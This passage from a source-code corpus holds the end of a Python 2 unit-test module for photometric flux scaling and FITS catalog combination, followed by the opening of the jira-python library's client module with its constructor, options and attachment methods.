mask = numpy.zeros_like(measuredMags)
for i in xrange(self.nObjs):
mask[i, i % self.nImages ] = 1
scalings = measureFluxScaling(measuredMags, measuredErr, mask)
self.assertTrue( (numpy.abs(scalings - 1) < 1e-2).all() )
######################
###############
class TestFluxScale_vector(unittest.TestCase):
def setUp(self):
self.nObjs = 10000
self.nImages = 6
self.nApers = 4
self.mask = numpy.ones((self.nObjs, self.nApers, self.nImages))
##################
def testMeasureFluxScaling_offset_simple(self):
expectedMags = numpy.zeros((self.nObjs, self.nApers))
expectedMagerrs = .1*numpy.ones((self.nObjs, self.nApers))
inputScalings = numpy.ones(self.nImages)
inputScalings[:3] = .5
inputScalings[3:] = 1.5
measuredMags = numpy.ones((self.nObjs, self.nApers, self.nImages))
measuredErr = .1*numpy.ones_like(measuredMags)
for i in xrange(self.nImages):
measuredMags[:,:,i] = expectedMags - 2.5*numpy.log10(inputScalings[i])
scalings = measureFluxScaling(measuredMags, measuredErr, self.mask)
measuredFluxs = 10**(-.4*measuredMags)
measuredFluxs = measuredFluxs * scalings
for i in xrange(self.nImages):
index = self.nImages - i - 1
measuredFluxs[:,:,index] = measuredFluxs[:,:,index] - measuredFluxs[:,:,0]
self.assertTrue( (numpy.abs(measuredFluxs) < .1).all() )
###############
class TestCombineFluxs(unittest.TestCase):
# def testStackFluxs_scalar(self):
#
# fluxs = [ i*numpy.ones(10) for i in xrange(6) ]
# expected = numpy.column_stack(fluxs)
# stackedFlux = _stackFluxs(fluxs)
# self.assertEquals(stackedFlux.shape, expected.shape)
# for i in xrange(6):
# self.assertTrue((stackedFlux[i] == expected).all())
#
#
# #################
#
# def testStackFluxs_vector(self):
#
# fluxs=[i*numpy.ones((10,3)) for i in xrange(6)]
# stackedFlux = _stackFluxs(fluxs)
# self.assertEquals(stackedFlux.shape, (10,3,6))
# for i in xrange(6):
# self.assertTrue((stackedFlux[:,:,i] == i*numpy.ones((10,3))).all())
#
# #################
def testWeightedAverage(self):
fluxs = numpy.ones((30,6))
for i in xrange(30):
fluxs[i,:] = i
errs = numpy.ones_like(fluxs)
mask = numpy.ones((30,6))
flux, err = _weightedAverage(fluxs,errs,mask)
self.assertEquals(flux.shape, (30,))
self.assertEquals(err.shape, (30,))
self.assertTrue((flux == numpy.array(xrange(30))).all())
self.assertTrue((abs(err -numpy.ones(30)/numpy.sqrt(6)) < 1e-8).all())
#####################
def testWeightedAverage_mask(self):
fluxs = numpy.ones((30,6))
for i in xrange(30):
fluxs[i,:] = i
fluxs[:,2] = 1e5
errs = numpy.ones_like(fluxs)
mask = numpy.ones((30,6))
mask[:,2] = 0.
flux, err = _weightedAverage(fluxs,errs,mask)
self.assertEquals(flux.shape, (30,))
self.assertEquals(err.shape, (30,))
self.assertTrue((flux == numpy.array(xrange(30))).all())
self.assertTrue((abs(err -numpy.ones(30)/numpy.sqrt(5)) < 1e-8).all())
########################
def testWeightedAverage_vector(self):
testfluxs = [ numpy.ones((30,5)) for i in xrange(6)]
fluxs = _stackFluxs(testfluxs)
for i in xrange(30):
fluxs[i,:,:] = i
errs = _stackFluxs(testfluxs)
mask = numpy.ones((30,5,6))
mask[:,:,2] = 0.
flux, err = _weightedAverage(fluxs,errs,mask)
self.assertEquals(flux.shape, (30,5))
self.assertEquals(err.shape, (30,5))
expectedFluxs = numpy.ones((30,5))
for i in xrange(30):
expectedFluxs[i,:] = i
self.assertTrue((flux == expectedFluxs).all())
self.assertTrue((abs(err - numpy.ones((30,5))/numpy.sqrt(5)) < 1e-8).all())
###########################
def testWeightedAverage_nearzeroweights(self):
testfluxs = [ numpy.ones(30) for i in xrange(6)]
fluxs = _stackFluxs(testfluxs)
for i in xrange(30):
fluxs[i,:] = i
testerrs = [ math.pi*1e30*numpy.ones(30) for i in xrange(6) ]
errs = _stackFluxs(testerrs)
mask = numpy.ones((30,6))
flux, err = _weightedAverage(fluxs,errs,mask)
self.assertEquals(flux.shape, (30,))
self.assertEquals(err.shape, (30,))
self.assertTrue((abs(flux - numpy.array(xrange(30))) < 1e-8 ).all())
self.assertTrue((abs(err - math.pi*1e30*numpy.ones(30)/numpy.sqrt(6)) < 1e-8).all())
##########################
def testWeightedAverage_allbad(self):
fluxs = numpy.ones((30,6))
errs = .1*numpy.ones((30,6))
mask = numpy.zeros_like(fluxs)
flux, err = _weightedAverage(fluxs, errs, mask)
self.assertTrue( (flux == __bad_flux__).all() )
self.assertTrue( (err == __bad_flux__).all() )
###########################
def testStatCombineFluxs(self):
fluxs = numpy.ones((10,5))
errs = .1*numpy.ones_like(fluxs)
mask = numpy.ones_like(fluxs)
fluxs[:,-1] = 1.1
flux, err = statCombineFluxs(fluxs, errs, mask)
expectedFlux = 1.02
expectedErr = .1/numpy.sqrt(5)
self.assertTrue((expectedFlux == flux).all())
self.assertTrue((expectedErr == err).all())
##########################
def testStatCombineFluxs_5sigmaReject(self):
fluxs = numpy.ones((10,5))
errs = .1*numpy.ones_like(fluxs)
mask = numpy.ones_like(fluxs)
fluxs[:,-1] = 2
flux, err = statCombineFluxs(fluxs, errs, mask)
expectedFlux = 1
expectedErr = .1/numpy.sqrt(4)
self.assertTrue((expectedFlux == flux).all())
self.assertTrue((expectedErr == err).all())
###########################
def testBadFlux(self):
self.assertTrue(__bad_flux__ < 0)
############################
def testStatCombineFluxs_NullingOutliers(self):
fluxs = numpy.ones((3,5))
fluxs[:,2] = 1e5
errs = 0.1*numpy.ones_like(fluxs)
mask = numpy.ones_like(fluxs)
flux, err = statCombineFluxs(fluxs,errs,mask)
self.assertTrue((flux == 1).all())
self.assertTrue((err == (0.1/numpy.sqrt(4))).all())
###############################
def testStatCombineFluxs_NullingAndLegitOutliers(self):
fluxs = numpy.ones((3,6))
fluxs[:,2] = 1.1
fluxs[:,3] = 2
fluxs[1:,-1] = 1e5
errs = 0.1*numpy.ones_like(fluxs)
mask = numpy.ones_like(fluxs)
flux, err = statCombineFluxs(fluxs,errs,mask)
expectedFlux = 1.025*numpy.ones(3)
expectedFlux[0] = 1.02
expectedErr = (0.1/numpy.sqrt(4)) * numpy.ones(3)
expectedErr[0] = 0.1/ numpy.sqrt(5)
self.assertTrue((numpy.abs(flux - expectedFlux) < 1e-5).all())
self.assertTrue((numpy.abs(err - expectedErr) < 1e-5).all())
###############################
def testStatCombineFluxs_NullingAndLegitOutliers_Vector(self):
fluxs = numpy.ones((3,5,6))
fluxs[:,:,2] = 1.1
fluxs[:,:,3] = 2
fluxs[1:,:,-1] = 1e5
errs = 0.1*numpy.ones_like(fluxs)
mask = numpy.ones_like(fluxs)
flux, err = statCombineFluxs(fluxs,errs,mask)
self.assertEquals(flux.shape, (3,5))
self.assertEquals(err.shape, (3,5))
expectedFlux = 1.025*numpy.ones((3,5))
expectedFlux[0,:] = 1.02
expectedErr = (0.1/numpy.sqrt(4)) * numpy.ones((3,5))
expectedErr[0,:] = 0.1/ numpy.sqrt(5)
self.assertTrue((numpy.abs(flux - expectedFlux) < 1e-5).all())
self.assertTrue((numpy.abs(err - expectedErr) < 1e-5).all())
###############################
def testMedian_Simple(self):
fluxs = numpy.ones((3,5))
fluxs[:,2] = 1e5
errs = 0.1*numpy.ones_like(fluxs)
mask = numpy.ones_like(fluxs)
flux = _median(fluxs, mask)
self.assertTrue((flux == 1).all())
#################################
def testMedian_Mask(self):
fluxs = numpy.vstack(10*[numpy.arange(6)])
fluxs[:,2] = 1e5
errs = 0.1*numpy.ones_like(fluxs)
mask = numpy.ones_like(fluxs)
mask[5:,3] = 0
flux = _median(fluxs, mask)
expected = 3.5*numpy.ones(10)
expected[5:] = 4
self.assertTrue((flux == expected).all())
#################################
def testMedian_vectorFlux(self):
fluxImages = []
for i in xrange(6):
fluxImages.append(i*numpy.ones((10,3)))
fluxs = _stackFluxs(fluxImages)
fluxs[:,:,2] = 1e5
mask = numpy.ones_like(fluxs)
flux = _median(fluxs, mask)
expected = 3.5*numpy.ones((10,3))
self.assertTrue((flux == expected).all())
##############################
class TestCombineCatalogs(unittest.TestCase):
################
def testCombineCats(self):
normkeys = 'FLUX_APER FLUXERR_APER MAG_APER MAGERR_APER BLANK1 BLANK2'.split()
mastercols = [pyfits.Column(name = k,
format = 'E',
array = numpy.ones(30)) \
for k in normkeys]
mastercols[0] = pyfits.Column(name = 'FLUX_APER',
format = 'E',
array = numpy.random.standard_normal(30))
zerokeys = 'Flag MaxVal BackGr NPIX'.split()
for key in zerokeys:
mastercols.append(pyfits.Column(name = key,
format = 'E',
array = numpy.zeros(30)))
onekeys = 'IMAFLAGS_ISO'.split()
for key in onekeys:
mastercols.append(pyfits.Column(name = key,
format = 'J',
array = numpy.ones(30)))
cats = [ldac.LDACCat(pyfits.BinTableHDU.from_columns(pyfits.ColDefs(mastercols)))]
for i in xrange(5):
cols = [pyfits.Column(name = k,
format = 'E',
array = numpy.random.standard_normal(30)) \
for k in normkeys]
for key in zerokeys:
cols.append(pyfits.Column(name = key,
format = 'E',
array = numpy.zeros(30)))
for key in onekeys:
cols.append(pyfits.Column(name = key,
format = 'E',
array = numpy.ones(30)))
cats.append(ldac.LDACCat(pyfits.BinTableHDU.from_columns(pyfits.ColDefs(cols))))
images = [ Image(cat, rms = 0, apers = numpy.ones(1), gain = 1) for cat in cats ]
keys = normkeys[2:] + zerokeys + onekeys
combinedcat = combineCats(images)
self.assertEqual(type(combinedcat), type(cats[0]))
for key in keys:
self.assertTrue(key in combinedcat.keys())
self.assertTrue((combinedcat['BLANK1'] == 1).all())
self.assertTrue((combinedcat['BLANK2'] == 1).all())
self.assertTrue((combinedcat['FLUX_APER-1'] != 1).all())
self.assertTrue((combinedcat['FLUXERR_APER-1'] != 1).all())
mags, magerrs = calcMags(combinedcat['FLUX_APER-1'],
combinedcat['FLUXERR_APER-1'])
self.assertTrue( (numpy.abs(combinedcat['MAG_APER-1'] - mags) < 1e-5).all() )
self.assertTrue( (numpy.abs(combinedcat['MAGERR_APER-1'] - magerrs) < 1e-5).all())
#######################################
def testCombineCats_doubleprecision(self):
doublekeys = 'ALPHA_J2000 DELTA_J2000'.split()
normkeys = 'FLUX_APER FLUXERR_APER'.split()
zerokeys = 'Flag MaxVal BackGr NPIX'.split()
onekeys = 'IMAFLAGS_ISO'.split()
cats = []
for i in xrange(6):
cols = [pyfits.Column(name = k,
format = 'E',
array = numpy.random.standard_normal(30))\
for k in normkeys]
for key in zerokeys:
cols.append(pyfits.Column(name = key,
format = 'E',
array = numpy.zeros(30)))
for key in doublekeys:
cols.append(pyfits.Column(name = key,
format = 'D',
array = numpy.random.standard_normal(30)))
for key in onekeys:
cols.append(pyfits.Column(name = key,
format = 'D',
array = numpy.ones(30)))
cats.append(ldac.LDACCat(pyfits.BinTableHDU.from_columns(pyfits.ColDefs(cols))))
keys = normkeys + zerokeys + doublekeys + onekeys
images = [ Image(cat, rms=0, apers=numpy.ones(1), gain=1) for cat in cats ]
combinedcat = combineCats(images)
self.assertEquals(cats[0]['ALPHA_J2000'].dtype, combinedcat['ALPHA_J2000'].dtype)
self.assertEquals(cats[0]['DELTA_J2000'].dtype, combinedcat['DELTA_J2000'].dtype)
self.assertTrue((abs(cats[0]['ALPHA_J2000'] - combinedcat['ALPHA_J2000']) < 1e-16).all())
self.assertTrue((abs(cats[0]['DELTA_J2000'] - combinedcat['DELTA_J2000']) < 1e-16).all())
##############################
def testCombineCats_vector(self):
normkeys = 'FLUX_APER FLUXERR_APER'.split()
zerokeys = 'Flag MaxVal BackGr NPIX'.split()
onekeys = 'IMAFLAGS_ISO'.split()
cats = []
for i in xrange(6):
cols = [pyfits.Column(name = k,
format = '5E',
array = numpy.random.standard_normal((30,5)))\
for k in normkeys]
for key in zerokeys:
cols.append(pyfits.Column(name = key,
format = 'E',
array = numpy.zeros(30)))
for key in onekeys:
cols.append(pyfits.Column(name = key,
format = 'J',
array = numpy.ones(30)))
cats.append(ldac.LDACCat(pyfits.BinTableHDU.from_columns(pyfits.ColDefs(cols))))
keys = zerokeys + onekeys
images = [ Image(cat, rms=0, apers=numpy.ones(1), gain= 1) for cat in cats ]
combinedcat = combineCats(images)
self.assertEqual(type(combinedcat), type(cats[0]))
for key in keys:
self.assertTrue(key in combinedcat.keys())
self.assertEqual(combinedcat['FLUX_APER-1'].shape, (30,5))
self.assertEqual(combinedcat['FLUXERR_APER-1'].shape, (30,5))
self.assertEqual(combinedcat['MAG_APER-1'].shape, (30,5))
self.assertEqual(combinedcat['MAGERR_APER-1'].shape, (30,5))
###################################
def testCombineCats_multichip(self):
zerokeys = 'Flag MaxVal BackGr NPIX'.split()
cats = []
for i in xrange(6):
cols = [ pyfits.Column(name = key,
format = 'E',
array = numpy.zeros(30)) \
for key in zerokeys ]
if i == 1:
flags = numpy.ones(30)
elif i == 2:
flags = 2*numpy.ones(30)
else:
flags = numpy.random.random_integers(1,2,30)
flags[25:] = 4
flux = numpy.ones(30)
flux[flags==2] = 2
flux[flags==4] = 4
fluxerr = numpy.random.standard_normal(30)
cols.append(pyfits.Column(name = 'FLUX_APER',
format = 'E',
array = flux))
cols.append(pyfits.Column(name = 'FLUXERR_APER',
format = 'E',
array = fluxerr))
cols.append(pyfits.Column(name = 'IMAFLAGS_ISO',
format = 'J',
array = flags))
cats.append(ldac.LDACCat(pyfits.BinTableHDU.from_columns(pyfits.ColDefs(cols))))
keys = zerokeys
images = [ Image(cat, rms=0, apers=numpy.ones(1), gain= 1) for cat in cats ]
combinedcat = combineCats(images)
self.assertEqual(type(combinedcat), type(cats[0]))
for key in keys:
self.assertTrue(key in combinedcat.keys())
self.assertEqual(combinedcat['FLUX_APER-1'].shape, (30,))
self.assertEqual(combinedcat['FLUXERR_APER-1'].shape, (30,))
self.assertTrue((combinedcat['FLUX_APER-1'][:25] == 1).all())
self.assertTrue((combinedcat['FLUX_APER-1'][25:] == __bad_flux__).all())
self.assertEqual(combinedcat['MAG_APER-1'].shape, (30,))
self.assertEqual(combinedcat['MAGERR_APER-1'].shape, (30,))
self.assertTrue((combinedcat['MAG_APER-1'][:25] == 0).all())
self.assertTrue((combinedcat['MAG_APER-1'][25:] == __bad_mag__).all())
self.assertEqual(combinedcat['FLUX_APER-2'].shape, (30,))
self.assertEqual(combinedcat['FLUXERR_APER-2'].shape, (30,))
self.assertTrue((combinedcat['FLUX_APER-2'][:25] == 2).all())
self.assertTrue((combinedcat['FLUX_APER-2'][25:] == __bad_flux__).all())
self.assertEqual(combinedcat['MAG_APER-2'].shape, (30,))
self.assertEqual(combinedcat['MAGERR_APER-2'].shape, (30,))
self.assertTrue((combinedcat['MAG_APER-2'][:25] == -2.5*numpy.log10(2)).all())
self.assertTrue((combinedcat['MAG_APER-2'][25:] == __bad_mag__).all())
self.assertEqual(combinedcat['FLUX_APER-4'].shape, (30,))
self.assertEqual(combinedcat['FLUXERR_APER-4'].shape, (30,))
self.assertTrue((combinedcat['FLUX_APER-4'][25:] == 4).all())
self.assertTrue((combinedcat['FLUX_APER-4'][:25] == __bad_flux__).all())
self.assertEqual(combinedcat['MAG_APER-4'].shape, (30,))
self.assertEqual(combinedcat['MAGERR_APER-4'].shape, (30,))
self.assertTrue((combinedcat['MAG_APER-4'][25:] == -2.5*numpy.log10(4)).all())
self.assertTrue((combinedcat['MAG_APER-4'][:25] == __bad_mag__).all())
######################
def testCombineCats_instrum(self):
normkeys = 'FLUX_APER FLUXERR_APER'.split()
zerokeys = 'Flag MaxVal BackGr NPIX'.split()
cats = []
for i in xrange(6):
cols = [pyfits.Column(name = k,
format = '5E',
array = numpy.random.standard_normal((30,5)))\
for k in normkeys]
for key in zerokeys:
cols.append(pyfits.Column(name = key,
format = 'E',
array = numpy.zeros(30)))
cols.append(pyfits.Column(name = 'IMAFLAGS_ISO',
format = 'J',
array = numpy.ones(30)))
cats.append(ldac.LDACCat(pyfits.BinTableHDU.from_columns(pyfits.ColDefs(cols))))
keys = zerokeys
images = [ Image(cat, rms=0, apers=numpy.ones(1), gain=1) for cat in cats ]
combinedcat = combineCats(images, instrum='SUBARU-10_1')
self.assertEqual(type(combinedcat), type(cats[0]))
for key in keys:
self.assertTrue(key in combinedcat.keys())
self.assertEqual(combinedcat['FLUX_APER-SUBARU-10_1-1'].shape, (30,5))
self.assertEqual(combinedcat['FLUXERR_APER-SUBARU-10_1-1'].shape, (30,5))
self.assertEqual(combinedcat['MAG_APER-SUBARU-10_1-1'].shape, (30,5))
self.assertEqual(combinedcat['MAGERR_APER-SUBARU-10_1-1'].shape, (30,5))
##############
def testCombineCats_mastercat(self):
normkeys = 'FLUX_APER FLUXERR_APER'.split()
zerokeys = 'Flag BLANK1 MaxVal BackGr NPIX'.split()
cats = []
for i in xrange(6):
cols = [pyfits.Column(name = k,
format = '5E',
array = numpy.random.standard_normal((30,5)))\
for k in normkeys]
for key in zerokeys:
cols.append(pyfits.Column(name = key,
format = 'E',
array = numpy.zeros(30)))
cols.append(pyfits.Column(name = 'IMAFLAGS_ISO',
format = 'J',
array = numpy.ones(30)))
cats.append(ldac.LDACCat(pyfits.BinTableHDU.from_columns(pyfits.ColDefs(cols))))
mastercols = []
mastercols.append(pyfits.Column(name = 'FLUX_APER',
format = 'E',
array = 1e5*numpy.ones(30)))
mastercols.append(pyfits.Column(name = 'MAG_APER',
format = 'E',
array = numpy.ones(30)))
mastercols.append(pyfits.Column(name = 'BLANK1',
format = 'E',
array = numpy.ones(30)))
mastercat = ldac.LDACCat(pyfits.BinTableHDU.from_columns(pyfits.ColDefs(mastercols)))
keys = 'MAG_APER BLANK1'.split()
images = [ Image(cat, rms=0, apers=numpy.ones(5), gain = 1) for cat in cats ]
combinedcat = combineCats(images,
mastercat = mastercat)
self.assertEqual(type(combinedcat), type(cats[0]))
for key in keys:
self.assertTrue(key in combinedcat.keys())
self.assertTrue((combinedcat['MAG_APER'] == 1).all())
self.assertTrue((combinedcat['BLANK1'] == 1).all())
self.assertEqual(combinedcat['FLUX_APER-1'].shape, (30,5))
self.assertEqual(combinedcat['FLUXERR_APER-1'].shape, (30,5))
self.assertEqual(combinedcat['MAG_APER-1'].shape, (30,5))
self.assertEqual(combinedcat['MAGERR_APER-1'].shape, (30,5))
####################
def testFluxScale(self):
normkeys = []
zerokeys = 'Flag MaxVal BackGr NPIX'.split()
onekeys = 'FLUX_APER FLUXERR_APER IMAFLAGS_ISO'.split()
cats = []
for i in xrange(6):
cols = [pyfits.Column(name = k,
format = 'E',
array = numpy.random.standard_normal(30))\
for k in normkeys]
for key in zerokeys:
cols.append(pyfits.Column(name = key,
format = 'E',
array = numpy.zeros(30)))
for key in onekeys:
cols.append(pyfits.Column(name = key,
format = 'J',
array = numpy.ones(30)))
cats.append(ldac.LDACCat(pyfits.BinTableHDU.from_columns(pyfits.ColDefs(cols))))
cats[0]['FLUX_APER'][:] = .5*numpy.ones(30)
cats[-1]['FLUX_APER'][:] = 1.5*numpy.ones(30)
keys = zerokeys + onekeys
images = [ Image(cat, rms=0, apers=numpy.ones(1), gain=1) for cat in cats ]
combinedcat = combineCats(images, fluxscale = True)
zeropoint = numpy.mean(combinedcat['FLUX_APER-1'])
scaledFlux = combinedcat['FLUX_APER-1'] / zeropoint
self.assertTrue( (scaledFlux == 1).all() )
#verify outlier rejection not triggered
error1rejected = 1./numpy.sqrt(4)
error2rejected = 1./numpy.sqrt(3)
self.assertTrue ( (combinedcat['FLUXERR_APER-1'] != error1rejected).any() )
self.assertTrue ( (combinedcat['FLUXERR_APER-1'] != error2rejected).any() )
##################################################
def test():
testcases = [TestComponents, TestFluxScale, TestUnstackedPhotometry, TestCombineFluxs, TestUnstackedPhotometry_vector, TestCombineCatalogs, TestImage]
suite = unittest.TestSuite(map(unittest.TestLoader().loadTestsFromTestCase,
testcases))
unittest.TextTestRunner(verbosity=2).run(suite)
#####################################################
# COMMAND LINE EXECUTABLE
#####################################################
if __name__ == '__main__':
if len(sys.argv) == 2 and sys.argv[1] == 'test':
test()
else:
main()
| mit | 1,512,173,792,022,315,300 | 31.518957 | 170 | 0.519143 | false |
coddingtonbear/jira | jira/client.py | 1 | 100626 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
This module implements a friendly (well, friendlier) interface between the raw JSON
responses from JIRA and the Resource/dict abstractions provided by this library. Users
will construct a JIRA object as described below. Full API documentation can be found
at: https://jira-python.readthedocs.org/en/latest/
"""
from __future__ import unicode_literals
from __future__ import print_function
from functools import wraps
import imghdr
import mimetypes
import copy
import os
import re
import string
import tempfile
import logging
import json
import warnings
import pprint
import sys
try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
from six import string_types, integer_types
# six.moves does not play well with pyinstaller, see https://github.com/pycontribs/jira/issues/38
# from six.moves import html_parser
if sys.version_info < (3, 0, 0):
import HTMLParser as html_parser
else:
import html.parser as html_parser
import requests
try:
from requests_toolbelt import MultipartEncoder
except ImportError:
    pass
# JIRA specific resources
from jira.resources import Resource, Issue, Comment, Project, Attachment, Component, Dashboard, Filter, Votes, Watchers, \
Worklog, IssueLink, IssueLinkType, IssueType, Priority, Version, Role, Resolution, SecurityLevel, Status, User, \
CustomFieldOption, RemoteLink
# GreenHopper specific resources
from jira.resources import GreenHopperResource, Board, Sprint
from jira.resilientsession import ResilientSession
from jira import __version__
from jira.utils import threaded_requests, json_loads, JIRAError, CaseInsensitiveDict
try:
from random import SystemRandom
random = SystemRandom()
except ImportError:
import random
# warnings.simplefilter('default')
# encoding = sys.getdefaultencoding()
# if encoding != 'UTF8':
# warnings.warn("Python default encoding is '%s' instead of 'UTF8' which means that there is a big change of having problems. Possible workaround http://stackoverflow.com/a/17628350/99834" % encoding)
def translate_resource_args(func):
"""
Decorator that converts Issue and Project resources to their keys when used as arguments.
"""
@wraps(func)
def wrapper(*args, **kwargs):
arg_list = []
for arg in args:
if isinstance(arg, (Issue, Project)):
arg_list.append(arg.key)
else:
arg_list.append(arg)
result = func(*arg_list, **kwargs)
return result
return wrapper
class ResultList(list):
def __init__(self, iterable=None, _total=None):
if iterable is not None:
list.__init__(self, iterable)
else:
list.__init__(self)
self.total = _total if _total is not None else len(self)
class JIRA(object):
"""
User interface to JIRA.
Clients interact with JIRA by constructing an instance of this object and calling its methods. For addressable
resources in JIRA -- those with "self" links -- an appropriate subclass of :py:class:`Resource` will be returned
with customized ``update()`` and ``delete()`` methods, along with attribute access to fields. This means that calls
of the form ``issue.fields.summary`` will be resolved into the proper lookups to return the JSON value at that
mapping. Methods that do not return resources will return a dict constructed from the JSON response or a scalar
value; see each method's documentation for details on what that method returns.
"""
DEFAULT_OPTIONS = {
"server": "http://localhost:2990/jira",
"rest_path": "api",
"rest_api_version": "2",
"verify": True,
"resilient": True,
"async": False,
"client_cert": None,
"check_update": True,
"headers": {
'X-Atlassian-Token': 'no-check',
'Cache-Control': 'no-cache',
# 'Accept': 'application/json;charset=UTF-8', # default for REST
'Content-Type': 'application/json', # ;charset=UTF-8',
# 'Accept': 'application/json', # default for REST
#'Pragma': 'no-cache',
#'Expires': 'Thu, 01 Jan 1970 00:00:00 GMT'
}
}
checked_version = False
JIRA_BASE_URL = '{server}/rest/api/{rest_api_version}/{path}'
AGILE_BASE_URL = '{server}/rest/greenhopper/1.0/{path}'
def __init__(self, server=None, options=None, basic_auth=None, oauth=None, validate=None, async=False,
logging=True, max_retries=3):
"""
Construct a JIRA client instance.
Without any arguments, this client will connect anonymously to the JIRA instance
        started by the Atlassian Plugin SDK from one of the ``atlas-run``, ``atlas-debug``,
or ``atlas-run-standalone`` commands. By default, this instance runs at
``http://localhost:2990/jira``. The ``options`` argument can be used to set the JIRA instance to use.
Authentication is handled with the ``basic_auth`` argument. If authentication is supplied (and is
accepted by JIRA), the client will remember it for subsequent requests.
For quick command line access to a server, see the ``jirashell`` script included with this distribution.
        The easiest way to instantiate is using j = JIRA("https://jira.atlassian.com")
:param options: Specify the server and properties this client will use. Use a dict with any
of the following properties:
* server -- the server address and context path to use. Defaults to ``http://localhost:2990/jira``.
* rest_path -- the root REST path to use. Defaults to ``api``, where the JIRA REST resources live.
* rest_api_version -- the version of the REST resources under rest_path to use. Defaults to ``2``.
* verify -- Verify SSL certs. Defaults to ``True``.
* client_cert -- a tuple of (cert,key) for the requests library for client side SSL
:param basic_auth: A tuple of username and password to use when establishing a session via HTTP BASIC
authentication.
:param oauth: A dict of properties for OAuth authentication. The following properties are required:
* access_token -- OAuth access token for the user
* access_token_secret -- OAuth access token secret to sign with the key
* consumer_key -- key of the OAuth application link defined in JIRA
* key_cert -- private key file to sign requests with (should be the pair of the public key supplied to
JIRA in the OAuth application link)
        :param validate: If true it will validate your credentials first. Remember that if you are accessing JIRA
            as anonymous it will fail to instantiate.
:param async: To enable async requests for those actions where we implemented it, like issue update() or delete().
Obviously this means that you cannot rely on the return code when this is enabled.
"""
if options is None:
options = {}
if server and hasattr(server, 'keys'):
warnings.warn(
"Old API usage, use JIRA(url) or JIRA(options={'server': url}, when using dictionary always use named parameters.",
DeprecationWarning)
options = server
server = None
if server:
options['server'] = server
if async:
options['async'] = async
self.logging = logging
self._options = copy.copy(JIRA.DEFAULT_OPTIONS)
self._options.update(options)
# Rip off trailing slash since all urls depend on that
if self._options['server'].endswith('/'):
self._options['server'] = self._options['server'][:-1]
self._try_magic()
if oauth:
self._create_oauth_session(oauth)
elif basic_auth:
self._create_http_basic_session(*basic_auth)
self._session.headers.update(self._options['headers'])
else:
verify = self._options['verify']
self._session = ResilientSession()
self._session.verify = verify
self._session.headers.update(self._options['headers'])
self._session.max_retries = max_retries
if validate:
# This will raise an Exception if you are not allowed to login.
# It's better to fail faster than later.
self.session()
# We need version in order to know what API calls are available or not
si = self.server_info()
try:
self._version = tuple(si['versionNumbers'])
except Exception as e:
globals()['logging'].error("invalid server_info: %s", si)
raise e
if self._options['check_update'] and not JIRA.checked_version:
self._check_update_()
JIRA.checked_version = True
def _check_update_(self):
# check if the current version of the library is outdated
try:
data = requests.get("http://pypi.python.org/pypi/jira/json", timeout=2.001).json()
released_version = data['info']['version']
if released_version > __version__:
warnings.warn("You are running an outdated version of JIRA Python %s. Current version is %s. Do not file any bugs against older versions." % (
__version__, released_version))
except requests.RequestException:
pass
except Exception as e:
logging.warning(e)
def __del__(self):
session = getattr(self, "_session", None)
if session is not None:
if sys.version_info < (3, 4, 0): # workaround for https://github.com/kennethreitz/requests/issues/2303
session.close()
def _check_for_html_error(self, content):
# TODO: Make it return errors when content is a webpage with errors
        # JIRA has the bad habit of returning errors in pages with HTTP 200 and
        # embedding the error in a huge webpage.
if '<!-- SecurityTokenMissing -->' in content:
logging.warning("Got SecurityTokenMissing")
raise JIRAError("SecurityTokenMissing: %s" % content)
return False
return True
# Information about this client
def client_info(self):
"""Get the server this client is connected to."""
return self._options['server']
# Universal resource loading
def find(self, resource_format, ids=None):
"""
Get a Resource object for any addressable resource on the server.
This method is a universal resource locator for any RESTful resource in JIRA. The
argument ``resource_format`` is a string of the form ``resource``, ``resource/{0}``,
``resource/{0}/sub``, ``resource/{0}/sub/{1}``, etc. The format placeholders will be
populated from the ``ids`` argument if present. The existing authentication session
will be used.
The return value is an untyped Resource object, which will not support specialized
:py:meth:`.Resource.update` or :py:meth:`.Resource.delete` behavior. Moreover, it will
not know to return an issue Resource if the client uses the resource issue path. For this
reason, it is intended to support resources that are not included in the standard
Atlassian REST API.
:param resource_format: the subpath to the resource string
:param ids: values to substitute in the ``resource_format`` string
:type ids: tuple or None
"""
resource = Resource(resource_format, self._options, self._session)
resource.find(ids)
return resource
def async_do(self, size=10):
"""
This will execute all async jobs and wait for them to finish. By default it will run on 10 threads.
size: number of threads to run on.
:return:
"""
if hasattr(self._session, '_async_jobs'):
logging.info("Executing async %s jobs found in queue by using %s threads..." % (
len(self._session._async_jobs), size))
threaded_requests.map(self._session._async_jobs, size=size)
# Application properties
# non-resource
def application_properties(self, key=None):
"""
Return the mutable server application properties.
:param key: the single property to return a value for
"""
params = {}
if key is not None:
params['key'] = key
return self._get_json('application-properties', params=params)
def set_application_property(self, key, value):
"""
Set the application property.
:param key: key of the property to set
:param value: value to assign to the property
"""
url = self._options['server'] + \
'/rest/api/2/application-properties/' + key
payload = {
'id': key,
'value': value
}
r = self._session.put(
url, data=json.dumps(payload))
def applicationlinks(self, cached=True):
"""
List of application links
:return: json
"""
# if cached, return the last result
if cached and hasattr(self, '_applicationlinks'):
return self._applicationlinks
#url = self._options['server'] + '/rest/applinks/latest/applicationlink'
url = self._options['server'] + \
'/rest/applinks/latest/listApplicationlinks'
r = self._session.get(url)
o = json_loads(r)
if 'list' in o:
self._applicationlinks = o['list']
else:
self._applicationlinks = []
return self._applicationlinks
# Attachments
def attachment(self, id):
"""Get an attachment Resource from the server for the specified ID."""
return self._find_for_resource(Attachment, id)
# non-resource
def attachment_meta(self):
"""Get the attachment metadata."""
return self._get_json('attachment/meta')
@translate_resource_args
def add_attachment(self, issue, attachment, filename=None):
"""
Attach an attachment to an issue and returns a Resource for it.
The client will *not* attempt to open or validate the attachment; it expects a file-like object to be ready
for its use. The user is still responsible for tidying up (e.g., closing the file, killing the socket, etc.)
:param issue: the issue to attach the attachment to
:param attachment: file-like object to attach to the issue, also works if it is a string with the filename.
:param filename: optional name for the attached file. If omitted, the file object's ``name`` attribute
            is used. If you acquired the file-like object by any other method than ``open()``, make sure
that a name is specified in one way or the other.
:rtype: an Attachment Resource
"""
if isinstance(attachment, string_types):
attachment = open(attachment, "rb")
if hasattr(attachment, 'read') and hasattr(attachment, 'mode') and attachment.mode != 'rb':
logging.warning(
"%s was not opened in 'rb' mode, attaching file may fail." % attachment.name)
# TODO: Support attaching multiple files at once?
url = self._get_url('issue/' + str(issue) + '/attachments')
fname = filename
if not fname:
fname = os.path.basename(attachment.name)
if 'MultipartEncoder' not in globals():
method = 'old'
r = self._session.post(
url,
files={
